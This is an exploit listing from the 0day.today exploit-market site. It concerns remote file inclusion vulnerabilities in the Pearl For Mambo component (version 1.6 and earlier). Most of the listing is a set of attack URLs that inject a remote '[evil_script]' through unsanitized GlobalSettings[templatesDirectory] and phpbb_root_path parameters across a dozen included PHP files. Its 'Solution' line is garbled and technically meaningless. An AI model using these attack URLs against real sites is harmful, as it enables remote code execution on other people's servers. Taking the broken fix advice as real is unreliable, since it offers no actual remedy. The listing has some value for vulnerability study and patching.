[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Pearl For Mambo <= 1.6 Multiple Remote File Include Vulnerabilities

Author
Kw3[R]Ln
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-550
Category
web applications
Date add
26-06-2006
Platform
unsorted
===================================================================
Pearl For Mambo <= 1.6 Multiple Remote File Include Vulnerabilities
===================================================================




--------------------------------------------------------------------------- 
Pearl For Mambo <= 1.6 (GlobalSettings[templatesDirectory]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RoSecurityGroup.net :
Remote : Yes
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Pearl For Mambo 
version : latest version [ 1.6 ]
Description: component for mambo
URL : http://www.pearlinger.com

------------------------------------------------------------------
Exploit:
~~~~~~~

Variable $GlobalSettings[templatesDirectory] not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.


# http://www.site.com/[path]/includes/functions_cms.php?phpbb_root_path=[evil_script] 
# http://www.site.com/[path]/includes/adminSensored.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminBoards.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminAttachments.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminAvatars.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminBackupdatabase.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminBanned.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminForums.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/adminSmileys.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/poll.php?GlobalSettings[templatesDirectory]=[evil_script]
# http://www.site.com/[path]/includes/move.php?GlobalSettings[templatesDirectory]=[evil_script]


---------------------------------------------------------------------------

Solution :
~~~~~~~~~

declare variabel $[evil_script]


-------------------------------- [ EOF] ----------------------------------



#  0day.today [2024-12-25]  #